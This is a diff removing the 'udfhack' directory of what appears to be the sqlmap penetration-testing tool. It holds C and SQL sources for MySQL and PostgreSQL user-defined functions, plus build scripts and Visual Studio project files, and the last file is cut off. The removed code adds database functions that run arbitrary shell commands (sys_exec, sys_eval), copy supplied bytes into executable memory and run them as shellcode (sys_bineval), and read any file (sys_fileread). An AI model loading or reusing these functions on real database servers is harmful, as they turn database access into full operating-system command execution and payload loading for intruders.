-# modify it under the terms of the GNU Lesser General Public
-# License as published by the Free Software Foundation; either
-# version 2.1 of the License, or (at your option) any later version.
-# 
-# This library is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# Lesser General Public License for more details.
-# 
-# You should have received a copy of the GNU Lesser General Public
-# License along with this library; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-
-# Adapt the following settings to your environment
-USER="postgres"
-PORT="5434"
-VERSION="8.4"
-#PORT="5433"
-#VERSION="8.3"
-#PORT="5432"
-#VERSION="8.2"
-
-echo "Compiling the PostgreSQL UDF"
-make ${VERSION}
-
-if test $? -ne 0; then
-	echo "ERROR: You need postgresql-server development software installed"
-	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-
-	if test "${VERSION}" == "8.2"; then
-		echo "apt-get install postgresql-server-dev-8.2"
-	elif test "${VERSION}" == "8.3"; then
-		echo "apt-get install postgresql-server-dev-8.3"
-	elif test "${VERSION}" == "8.4"; then
-		echo "apt-get install postgresql-server-dev-8.4"
-	fi
-
-	exit 1
-else
-	echo "PostgreSQL UDF compiled successfully"
-fi
-
-echo -e "\nPlease provide your PostgreSQL 'postgres' user's password"
-
-psql -h 127.0.0.1 -p ${PORT} -U ${USER} -q template1 < lib_postgresqludf_sys.sql
-
-if test $? -ne 0; then
-	echo "ERROR: unable to install the UDF"
-	exit 1
-else
-	echo "PostgreSQL UDF installed successfully"
-fi

extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -1,274 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009-2010  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-#ifdef SET_VARSIZE
-	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-#else
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-#endif
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif
-
-#undef fopen
-
-PG_FUNCTION_INFO_V1(sys_fileread);
-#ifdef PGDLLIMPORT
-extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
-#else
-extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
-#endif
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	int32 len;
-	int32 i, j;
-	char *filename;
-	char *result;
-	char *buffer;
-	char table[] = "0123456789ABCDEF";
-	FILE *file;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	filename = (char *)malloc(argv0_size + 1);
-
-	memcpy(filename, VARDATA(argv0), argv0_size);
-	filename[argv0_size] = '\0';
-	
-	file = fopen(filename, "rb");
-	if (!file)
-	{
-		PG_RETURN_NULL();
-	}
-	fseek(file, 0, SEEK_END);
-	len = ftell(file);
-	fseek(file, 0, SEEK_SET);
-
-	buffer=(char *)malloc(len + 1);
-	if (!buffer)
-	{
-		fclose(file);
-		PG_RETURN_NULL();
-	}
-
-	fread(buffer, len, 1, file);
-	fclose(file);
-
-	result = (char *)malloc(2*len + 1);
-	for (i=0, j=0; i<len; i++)
-	{
-		result[j++] = table[(buffer[i] >> 4) & 0x0f];
-		result[j++] = table[ buffer[i]	   & 0x0f];
-	}
-	result[j] = '\0';
-	
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-#ifdef SET_VARSIZE
-	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-#else
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-#endif
-	memcpy(VARDATA(result_text), result, strlen(result));
-	
-	free(result);
-	free(buffer);
-	free(filename);
-
-	PG_RETURN_POINTER(result_text);
-}

extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.sql

@@ -1,25 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009-2010  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

extra/udfhack/windows/README.txt

@@ -1,25 +0,0 @@
-Before compiling, certain enviroment variables have to be set,
-depending on the project used. For project lib_mysqludf_sys variables
-PLATFORM_SDK_DIR and MYSQL_SERVER_DIR have to be set, while for project
-lib_postgresqludf_sys variables PLATFORM_SDK_DIR and
-POSTGRESQL_SERVER_DIR.
-
-Variables:
---------------------------------------------------------------------------
-Variable name			Variable description
---------------------------------------------------------------------------
-PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
-MYSQL_SERVER_DIR		Directory where the MySQL is installed
-POSTGRESQL_SERVER_DIR	Directory where the PostgreSQL is installed
-
-Procedure for setting environment variables:
-My Computer -> Properties -> Advanced -> Environment Variables
-User variables -> New
-
-Sample values:
---------------------------------------------------------------------------
-Variable name			Variable value
---------------------------------------------------------------------------
-PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
-MYSQL_SERVER_DIR		C:\Program Files\MySQL\MySQL Server 5.1
-POSTGRESQL_SERVER_DIR	C:\Program Files\PostgreSQL\8.4

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln

@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 9.00
-# Visual C++ Express 2005
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_mysqludf_sys", "lib_mysqludf_sys\lib_mysqludf_sys.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Release|Win32 = Release|Win32
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
-		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
-		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
-		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,551 +0,0 @@
-/* 
-	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
-	web: http://www.mysqludf.org/
-	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define DLLEXP __declspec(dllexport) 
-#else
-#define DLLEXP
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#ifdef STANDARD
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#ifdef __WIN__
-typedef unsigned __int64 ulonglong;
-typedef __int64 longlong;
-#else
-typedef unsigned long long ulonglong;
-typedef long long longlong;
-#endif /*__WIN__*/
-#else
-#include <my_global.h>
-#include <my_sys.h>
-#endif
-#include <mysql.h>
-#include <m_ctype.h>
-#include <m_string.h>
-#include <stdlib.h>
-
-#include <ctype.h>
-
-#ifdef HAVE_DLOPEN
-#ifdef	__cplusplus
-extern "C" {
-#endif
-
-#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
-
-#ifdef __WIN__
-#define SETENV(name,value)		SetEnvironmentVariable(name,value);
-#else
-#define SETENV(name,value)		setenv(name,value,1);		
-#endif
-
-DLLEXP 
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_get
- * 
- * Gets the value of the specified environment variable.
- */
-DLLEXP 
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_get_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_set
- * 
- * Sets the value of the environment variables.
- * This function accepts a set of name/value pairs
- * which are then set as environment variables.
- * Use sys_get to retrieve the value of such a variable 
- */
-DLLEXP 
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_set_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_exec
- * 
- * executes the argument commandstring and returns its exit status.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_exec_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_eval
- * 
- * executes the argument commandstring and returns its standard output.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-);
-
-DLLEXP 
-void sys_eval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-);
-
-/**
- * sys_bineval
- * 
- * executes bynary opcodes.
- * Beware that this can be a security hazard.
- */
-DLLEXP 
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-DLLEXP 
-void sys_bineval_deinit(
-	UDF_INIT *initid
-);
-
-DLLEXP 
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-
-#ifdef	__cplusplus
-}
-#endif
-
-/**
- * lib_mysqludf_sys_info
- */
-my_bool lib_mysqludf_sys_info_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	my_bool status;
-	if(args->arg_count!=0){
-		strcpy(
-			message
-		,	"No arguments allowed (udf: lib_mysqludf_sys_info)"
-		);
-		status = 1;
-	} else {
-		status = 0;
-	}
-	return status;
-}
-
-void lib_mysqludf_sys_info_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* lib_mysqludf_sys_info(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	strcpy(result,LIBVERSION);
-	*length = strlen(LIBVERSION);
-	return result;
-}
-
-my_bool sys_get_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count==1
-	&&	args->arg_type[0]==STRING_RESULT){
-		initid->maybe_null = 1;
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_get_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_get(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	char* value = getenv(args->args[0]);
-	if(value == NULL){
-		*is_null = 1;
-	} else {
-		*length = strlen(value);
-	} 
-	return value;
-}
-
-my_bool sys_set_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	if(args->arg_count!=2){
-		strcpy(
-			message
-		,	"Expected exactly two arguments"
-		);		
-		return 1;
-	}
-	if(args->arg_type[0]!=STRING_RESULT){
-		strcpy(
-			message
-		,	"Expected string type for name parameter"
-		);		
-		return 1;
-	}
-	args->arg_type[1]=STRING_RESULT;
-	if((initid->ptr=malloc(
-		args->lengths[0]
-	+	1
-	+	args->lengths[1]
-	+	1
-	))==NULL){
-		strcpy(
-			message
-		,	"Could not allocate memory"
-		);		
-		return 1;
-	}	
-	return 0;
-}
-
-void sys_set_deinit(
-	UDF_INIT *initid
-){
-	if (initid->ptr!=NULL){
-		free(initid->ptr);
-	}
-}
-
-long long sys_set(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){	
-	char *name = initid->ptr;
-	char *value = name + args->lengths[0] + 1; 
-	memcpy(
-		name
-	,	args->args[0]
-	,	args->lengths[0]
-	);
-	*(name + args->lengths[0]) = '\0';
-	memcpy(
-		value
-	,	args->args[1]
-	,	args->lengths[1]
-	);
-	*(value + args->lengths[1]) = '\0';
-	return SETENV(name,value);		
-}
-
-my_bool sys_exec_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_exec_deinit(
-	UDF_INIT *initid
-){
-}
-
-my_ulonglong sys_exec(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *is_null
-,	char *error
-){
-	return system(args->args[0]);
-}
-
-my_bool sys_eval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char *message
-){
-	unsigned int i=0;
-	if(args->arg_count == 1
-	&& args->arg_type[i]==STRING_RESULT){
-		return 0;
-	} else {
-		strcpy(
-			message
-		,	"Expected exactly one string type parameter"
-		);		
-		return 1;
-	}
-}
-
-void sys_eval_deinit(
-	UDF_INIT *initid
-){
-}
-
-char* sys_eval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-,	char* result
-,	unsigned long* length
-,	char *is_null
-,	char *error
-){
-	FILE *pipe;
-	char line[1024];
-	unsigned long outlen, linelen;
-
-	result = malloc(1);
-	outlen = 0;
-
-	pipe = popen(args->args[0], "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (!(*result) || result == NULL) {
-		*is_null = 1;
-	} else {
-		result[outlen-1] = 0x00;
-		*length = strlen(result);
-	}
-
-	return result;
-}
-
-my_bool sys_bineval_init(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	return 0;
-}
-
-void sys_bineval_deinit(
-	UDF_INIT *initid
-){
-	
-}
-
-int sys_bineval(
-	UDF_INIT *initid
-,	UDF_ARGS *args
-){
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = strlen(args->args[0]);
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, args->args[0], len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		return 1;
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			return 1;
-
-		strncpy((char *)addr, args->args[0], len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	return 0;
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif
-
-#endif /* HAVE_DLOPEN */

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.vcproj

@@ -1,192 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="8,00"
-	Name="lib_mysqludf_sys"
-	ProjectGUID="{4D362A3E-CA53-444C-B1C8-C49641823875}"
-	RootNamespace="lib_mysqludf_sys"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="2"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
-				PreprocessorDefinitions="HAVE_DLOPEN"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)"
-				GenerateDebugInformation="true"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
-				PreprocessorDefinitions="HAVE_DLOPEN"
-				RuntimeLibrary="2"
-				EnableFunctionLevelLinking="true"
-				WarningLevel="3"
-				DebugInformationFormat="0"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib"
-				GenerateDebugInformation="false"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				OptimizeForWindows98="1"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\lib_mysqludf_sys.c"
-				>
-			</File>
-		</Filter>
-		<Filter
-			Name="Header Files"
-			Filter="h;hpp;hxx;hm;inl;inc;xsd"
-			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
-			>
-		</Filter>
-		<Filter
-			Name="Resource Files"
-			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
-			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
-			>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys.sln

@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 9.00
-# Visual C++ Express 2005
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_postgresqludf_sys", "lib_postgresqludf_sys\lib_postgresqludf_sys.vcproj", "{3527D58C-177A-47B3-981B-8104EBB3F943}"
-EndProject
-Global
